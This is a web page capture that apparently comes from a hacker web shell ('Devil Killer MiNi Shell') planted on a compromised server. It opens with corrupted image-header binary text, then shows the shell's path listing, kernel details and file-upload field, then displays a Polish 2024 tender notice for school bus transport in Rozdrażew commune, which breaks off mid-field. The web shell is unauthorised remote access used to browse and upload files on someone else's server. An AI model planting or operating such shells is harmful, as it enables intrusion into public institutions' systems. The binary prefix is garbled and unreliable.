JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240527/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240527/0034029001-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „ Przewóz uczniów z terenu gminy Rozdrażew dojeżdżających do szkół od dnia 2 września 2024 r. do 27 czerwca 2025 r., wraz z opieką” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gminny Zespół Szkół i Przedszkoli w Rozdrażewie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 250620230</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rozdrażew</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">63-708</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL416 - Kaliski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">627221339</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">biuro.gzsip@rozdrazew.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.rozdrazew.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „ Przewóz uczniów z terenu gminy Rozdrażew dojeżdżających do szkół od dnia 2 września 2024 r. do 27 czerwca 2025 r., wraz z opieką” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a3320d60-1c12-11ef-bfd3-e6cc5d6d04e5</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00340290</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-05-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00076804/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Przewóz uczniów z gminy Rozdrażew do Szkół</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-a3320d60-1c12-11ef-bfd3-e6cc5d6d04e5 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">www.rozdrazew.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">6. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z platformy E-zamówienia dostępnego na stronie internetowej<br/>https://ezamowienia.gov.pl/ w zakładce Centrum pomocy.<br/>7. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do komunikacji wynosi 150 MB.<br/>8. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na platformę e-Zamówienia.<br/>9. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający Wykonawca posługują się id postępowania: GZSz i P.261.1.2024.<br/>10. Zamawiający nie ponosi odpowiedzialności za niedostarczenie wiadomości do adresata ze względu na ochronę antywirusową i antyspamową, błędy w transmisji danych, w tym błędy spowodowane awariami systemów teleinformatycznych Wykonawcy, systemów zasilania lub też okolicznościami zależnymi od operatora zapewniającego transmisję danych.<br/>11. Zamawiający przekazuje ID postępowania w Rozdziale II SWZ. Dane postępowanie można wyszukać również na Liście wszystkich postępowań w platformie E-zamówienia klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki - postępowania.<br/>12. Sposób sporządzenia dokumentów elektronicznych musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 poz. 2415).<br/>13. Zamawiający wyznacza następujące osoby do kontaktu z Wykonawcami:<br/>Pan Mariusz Dąbrowski, tel.(62)722-13-39, email: biuro.gzsip@rozdrazew.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1. Administratorem Pani/Pana danych osobowych jest Gminny Zespół Szkół i Przedszkoli w Rozdrażewie ul. Rynek 1, 63-708 Rozdrażew, tel. 627221339, kontakt do inspektora ochrony danych osobowych biuro@msvs.com.pl.<br/>2. Dane osobowe Wykonawcy będą przetwarzane w celu przeprowadzenia postępowania o udzielenie zamówienia publicznego pod nazwą „ Przewóz uczniów z terenu gminy Rozdrażew dojeżdżających do Szkół w okresie od dnia 2 września 2024 r. do 27 czerwca 2025 r.” – znak sprawy GZSziP.261.1.2024 oraz w celu archiwizacji dokumentacji dot. tego postępowania.<br/>3. Odbiorcami przekazanych danych osobowych Wykonawcy będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy PZP.<br/>4. Dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 78 ust. 1 PZP przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>5. Obowiązek podania danych osobowych Wykonawcy jest wymogiem ustawowym określonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>6. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.<br/>7. Zamawiający informuje, że;<br/>a. udostępnia dane osobowe, o których mowa w art. 10 RODO (dane osobowe dotyczące wyroków skazujących i czynów zabronionych) w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale IX ustawy Pzp, do upływu terminu na ich wniesienie;<br/>b. udostępnianie protokołu i załączników do protokołu ma zastosowanie do wszystkich danych osobowych, z wyjątkiem tych, o których mowa w art. 9 ust. 1 RODO (tj. danych osobowych ujawniających pochodzenie rasowe lub etniczne, poglądy polityczne, przekonania religijne lub światopoglądowe, przynależność do związków zawodowych oraz przetwarzania danych genetycznych, danych biometrycznych w celu jednoznacznego zidentyfikowania osoby fizycznej lub danych dotyczących zdrowia, seksualności lub orientacji seksualnej tej osoby), zebranych w toku postępowania o udzielenie zamówienia;<br/>c. w przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez Zamawiającego, z uprawnienia, o którym mowa w art. 15 ust. 1–3 RODO (związanych z prawem Wykonawcy do uzyskania od administratora potwierdzenia, czy przetwarzane są dane osobowe jego dotyczące, prawem Wykonawcy do bycia poinformowanym o odpowiednich zabezpieczeniach, o których mowa w art. 46 RODO, związanych z przekazaniem jego danych osobowych do państwa trzeciego lub organizacji międzynarodowej oraz prawem otrzymania przez Wykonawcę od administratora kopii danych osobowych podlegających przetwarzaniu), Zamawiający może żądać od osoby występującej z żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia;<br/>d. skorzystanie przez osobę, której dane osobowe są przetwarzane, z uprawnienia, o którym mowa w art. 16 RODO (uprawnienie do sprostowania lub uzupełnienia danych osobowych), nie może naruszać integralności protokołu postępowania oraz jego załączników;<br/>e. w postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GZSz i P. 261.1.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: Przewóz uczniów z terenu gminy Rozdrażew dojeżdżających do Szkoły Podstawowej w Rozdrażewie ul. Krotoszyńska 42, Szkoły Filialnej w Dzielicach 4, Publicznego Przedszkola w Rozdrażewie ul. Krotoszyńska 9a, Szkoły Podstawowej Nr 3 z Oddziałami Integracyjnymi w Krotoszynie plac Szkolny 19 oraz do Zespołu Szkół Specjalnych w Krotoszynie ul. Ostrowska 49, a po zakończeniu nauki szkolnej i zajęć przedszkolnych do miejsca zamieszkania, od dnia 2 września 2024 r. do 27 czerwca 2025 r, wraz z zapewnieniem bezpieczeństwa i opieki uczniom podczas świadczenia usługi, za pośrednictwem opiekunów.<br/>Realizacja usługi w dniach nauki szkolnej, a także w dniach innych niż dni nauki szkolnej – rekolekcje, odpracowania dni nauki w innych terminach, święta szkolne itp., których konieczność wynika z organizacji roku szkolnego – według rozkładu okazjonalnego, uzgodnionego z Zamawiającym.<br/><br/>Liczba kilometrów dziennie:<br/><br/>	rano pierwszy kurs autobusu od poniedziałku do piątku - trasa 32,5 km,<br/><br/>	rano drugi kurs autobusu od poniedziałku do piątku - trasa 18,1 km,<br/><br/>	po południu pierwszy kurs autobusu od poniedziałku do piątku - trasa 6,4 km,<br/><br/>	po południu drugi kurs autobusu od poniedziałku do piątku - trasa 21,3 km,<br/><br/>	po południu trzeci kurs autobusu od poniedziałku do piątku - trasa 32,5 km,<br/><br/>	po południu czwarty kurs autobusu od poniedziałku do piątku - trasa 20,1 km,<br/><br/>Łączna liczba kilometrów dziennie: 130,9 <br/><br/>Wykonawca z obowiązany jest: <br/><br/>- do podstawienia pojazdów sprawnych technicznie, posiadających aktualne badania techniczne, posiadającymi aktualne ubezpieczenie OC i NNW, oznakowanych odpowiednimi tablicami świadczącymi o przewozie uczniów. W okresie jesienno –zimowym pojazdy dowożące uczniów muszą być ogrzewane.<br/>- niezwłocznego powiadomienia szkoły w przypadku awarii pojazdu,<br/>- zabezpieczenie zastępczego środka transportu o wymaganym standardzie w przypadku awarii pojazdu.<br/>- zapewnia bezpieczeństwo i opiekę nad dziećmi zgodnie z Zarządzeniem nr 75/2015 Wójta Gminy Rozdrażew „w sprawie wprowadzenia regulaminu sprawowania opieki nad uczniami w czasie ich przewozu do i ze szkół, przedszkoli na terenie Gminy Rozdrażew oraz Zespołu Szkół Specjalnych w Krotoszynie”, (w tym świadczenie pomocy dzieciom w zależności od zgłoszonych potrzeb, np. wyjście/wejście dzieci z/do pojazdu). Wykonawca zobowiązany jest do zatrudnienia opiekuna dla dowożonych dzieci - Opieka kierowcy jest niewystarczająca.<br/><br/><br/>Minimalny stan posiadania autobusów:<br/><br/>Autobusy zarejestrowane: <br/>	jeden na co najmniej 50 osób w tym co najmniej 50 miejsc siedzących,<br/>	drugi na co najmniej 70 osób w tym co najmniej 60 miejsc siedzących,<br/><br/>Wyjazd autobusów w porze umożliwiającej dojazd dzieciom i młodzieży na zajęcia do szkoły, przedszkola w Rozdrażewie na godz. 750 i na godz. 815 do Zespołu Szkół Specjalnych w Krotoszynie.<br/><br/><br/>Autobusy rozwożą dzieci i młodzież do miejsca zamieszkania.<br/><br/>WSPÓLNY SŁOWNIK ZAMÓWIEŃ (CPV)<br/><br/>60100000 – 9 - usługi w zakresie transportu drogowego<br/><br/><br/>RANO<br/><br/>1)	Autobus - zarejestrowany na co najmniej 50 osób /w tym co najmniej 50 miejsc siedzących/<br/><br/>ROZKŁAD JAZDY DLA SZKOŁY PODSTAWOWEJ W ROZDRAŻEWIE I SZKOŁY FILIALNEJ W DZIELICACH:<br/><br/>godz. km miejscowość<br/><br/>656 0 WOLENICE (przyst. autobus.)<br/><br/>700 1,6 DZIELICE (szkoła)<br/><br/>701 2,0 DZIELICE (przyst. autobus.)<br/><br/>705 2,9 DZIELICE (posesja 62A)<br/><br/>706 3,8 DZIELICE (posesja 73)<br/><br/>707 4,8 DZIELICE (krzyż. R-żew – Dzielice – Wolenice - Dębow.)<br/><br/>718 5,5 ROZDRAŻEW ul. Kompanii Rozdrażewskiej<br/>(posesja 15)<br/><br/>713 6,0 ROZDRAŻEW ul. Kompanii Rozdrażewskiej<br/> (posesja 11)<br/><br/>718 9,2 ROZDRAŻEW (szkoła podstawowa)<br/><br/>730 14,5 GRĘBÓW (centrum wsi przyst. autobus.)<br/><br/>732 15,6 GRĘBÓW (ujazd)<br/><br/>734 16,5 TRZEMESZNO (przyst. autobus./posesja 54)<br/><br/>736 17,2 TRZEMESZNO (przystanek autobusowy)<br/><br/>742 19,1 ROZDRAŻEW (przedszkole)<br/><br/>743 19,7 ROZDRAŻEW (szkoła podstawowa)<br/><br/>750 22,9 HENRYKÓW (przystanek autobusowy)<br/><br/>800 31,3 KROTOSZYN SP NR 3 (plac Szkolny)<br/><br/>805 32,5 KROTOSZYN - Szkoła specjalna (ul. Ostrowska 49)<br/><br/><br/>Objaśnienia:<br/>kursuje od poniedziałku do piątku – w dni nauki szkolnej<br/><br/>2)	Autobus	- zarejestrowany na co najmniej 70 osób /w tym co najmniej 60 miejsc siedzących/<br/><br/>ROZKŁAD JAZDY DLA SZKOŁY PODSTAWOWEJ W ROZDRAŻEWIE I PRZEDSZKOLA W ROZDRAŻEWIE:<br/><br/>godz. km miejscowość<br/><br/>700 0 DĄBROWA (salka przy sklepie)<br/><br/>703 1,3 CHWAŁKI (przyst. autobus)<br/>708 3,2 ROZDRAŻEW – (szkoła podstawowa)<br/><br/>713 5,7 ROZDRAŻEW ul. Kościuszki (przyst. autobus.)<br/><br/>716 7,7 ROZDRAŻEWEK (przyst. autob./pętla)<br/>	<br/>718 9,0 ROZDRAŻEWEK (przyst. autob./ posesja nr 16)<br/><br/>722 11,0 ROZDRAŻEWEK (posesja nr 11)<br/><br/>724 12,0 MACIEJEW (przyst. autob./skrzyżowanie pod lasem)<br/><br/>728 13,6 MACIEJEW (centrum wsi - przyst. autob.)<br/><br/>730 14,5 MACIEJEW (przyst. autob./posesja nr 3)<br/><br/>732 15,3 MACIEJEW (przyst. autob./posesja nr 1)<br/><br/>736 17,4 PRZEDSZKOLE ROZDRAŻEW<br/><br/>738 18,1 ROZDRAŻEW (szkoła podstawowa, przesiadka<br/> do szkół w Krotoszynie)<br/><br/>Objaśnienia:<br/>kursuje od poniedziałku do piątku – w dni nauki szkolnej<br/><br/>PO POŁUDNIU<br/><br/>3)	Autobus - zarejestrowany na co najmniej 50 osób /w tym co najmniej 50 miejsc siedzących/<br/><br/>ROZKŁAD JAZDY DLA SZKOŁY PODSTAWOWEJ W ROZDRAŻEWIE<br/><br/>godz. km miejscowość<br/><br/>1245 0 SP ROZDRAŻEW<br/><br/>1249 1,9 CHWAŁKI (przyst. autobus)<br/><br/>1252 3,2 DĄBROWA (salka przy sklepie)<br/><br/>1258 6,4 ROZDRAŻEW (szkoła podstawowa)<br/><br/>Objaśnienia: <br/>kursuje od poniedziałku do piątku – w dni nauki szkolnej.<br/><br/><br/><br/><br/><br/>4)	Autobus - zarejestrowany na co najmniej 70 osób /w tym co najmniej 60 miejsc siedzących/<br/><br/>ROZKŁAD JAZDY DLA SZKOŁY PODSTAWOWEJ W ROZDRAŻEWIE I PRZEDSZKOLA W ROZDRAŻEWIE:<br/><br/>godz. km	miejscowość<br/><br/>1300	0	SP ROZDRAŻEW<br/><br/>1302 0,6 PRZEDSZKOLE W ROZDRAŻEWIE<br/><br/>1305 2,5 ROZDRAŻEW (przystanek - ul. Kościuszki) <br/><br/>1308 4,5 ROZDRAŻEWEK (przystanek - pętla)<br/><br/>1310 5,8 ROZDRAŻEWEK (przystanek - posesja nr 16)<br/><br/>1313 7,8 ROZDRAŻEWEK (posesja nr 11)<br/><br/>1315 8,8 MACIEJEW (przystanek - skrzyżow. pod lasem)<br/><br/>1317 10,4 MACIEJEW (przystanek - centrum wsi)<br/><br/>1319 11,3 MACIEJEW ( przystanek - posesja nr 3)<br/><br/>1322 12,6 TRZEMESZNO (przystanek autobus.)<br/><br/>1323 13,2 TRZEMESZNO (przystanek - posesja 54)<br/><br/>1325 14,2 GRĘBÓW (przystanek - ujazd)<br/><br/>1327 15,3 GRĘBÓW (przystanek autobus. - centrum wsi)<br/><br/>1336 21,3 ROZDRAŻEW (szkoła podstawowa)<br/><br/>Objaśnienia:<br/>kursuje od poniedziałku do piątku – w dni nauki szkolnej.<br/><br/><br/><br/><br/><br/>5)	Autobus - zarejestrowany na co najmniej 50 osób /w tym co najmniej 50 miejsc siedzących/<br/><br/>ROZKŁAD JAZDY DLA SZKÓŁ KROTOSZYŃSKICH I SZKOŁY PODSTAWOWEJ W ROZDRAŻEWIE:<br/><br/>godz. km miejscowość<br/><br/>1400 0 KROTOSZYN SZK. SPECJ. (przystanek autobus)<br/><br/>1415 1,2 KROTOSZYN SP Nr 3 (przystanek - Plac szkolny)<br/><br/>1425 9,6 HENRYKÓW (przystanek autobusowy)<br/><br/>1430 12,8 ROZDRAŻEW (szkoła - przesiadka dzieci)<br/><br/>1435 15,3 TRZEMESZO (przystanek autobusowy)<br/><br/>1436 16,1 TRZEMESZNO (przystanek autobusowy - posesja 54)<br/><br/>1438 17,0 GRĘBÓW (przystanek - ujazd)<br/><br/>1440 18,1 GRĘBÓW (przystanek autobus. - centrum wsi)<br/><br/>1455 23,4 ROZDRAŻEW (szkoła)<br/><br/>1459	26,7	ROZDRAŻEW ul. Kompanii Rozdrażewskiej<br/> (posesja 11)<br/><br/>1500	27,5 ROZDRAŻEW ul. Kompanii Rozdrażewskiej<br/> (posesja 15)<br/><br/>1502 27,9 DZIELICE (krzyż. R-żew– Dzielice – Wolenice – Dębow.)<br/><br/>1505 28,9 DZIELICE (posesja 73)<br/><br/>1507 29,8 DZIELICE (posesja 62A)<br/><br/>1509 30,6 DZIELICE (przystanek autobus.)<br/><br/>1510 30,9 DZIELICE (szkoła)<br/><br/>1514 32,5 WOLENICE (przystanek autobus.)<br/><br/>Objaśnienia:<br/>kursuje od poniedziałku do piątku – w dni nauki szkolnej<br/><br/>6)	Autobus	-zarejestrowany na co najmniej 70 osób /w tym co najmniej 60 miejsc siedzących/<br/><br/>ROZKŁAD JAZDY DLA SZKOŁY PODSTAWOWEJ W ROZDRAŻEWIE:<br/><br/>godz. km miejscowość<br/><br/>1430 0 ROZDRAŻEW (szkoła, przesiad. ze szkół krotoszyńskich)<br/><br/>1434 2,7 MACIEJEW (przyst. autobus - posesja 1)<br/><br/>1436 3,5 MACIEJEW (przyst. autob. - posesja 3)<br/><br/>1438 4,4 MACIEJEW (przystanek autobus. - centrum wsi) <br/><br/>1442 6,0 MACIEJEW (przyst. autob. - skrzyżowanie pod lasem)<br/><br/>1444 7,0 ROZDRAŻEWEK (posesja 11)<br/><br/>1447 9,0 ROZDRAŻEWEK (przyst. autob.- posesja nr 16)<br/><br/>1449 10,3 ROZDRAŻEWEK (pętla - przyst. autobus. )<br/><br/>1454 13,7 ROZDRAŻEW (szkoła podstawowa)<br/><br/>1458 15,6 CHWAŁKI (przystanek autobusowy)<br/><br/>1500 16,9 DĄBROWA (salka przy sklepie)<br/><br/>1505 20,1 ROZDRAŻEW (szkoła podstawowa)<br/><br/>Objaśnienia:<br/>kursuje: od poniedziałku do piątku – w dni nauki szkolnej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 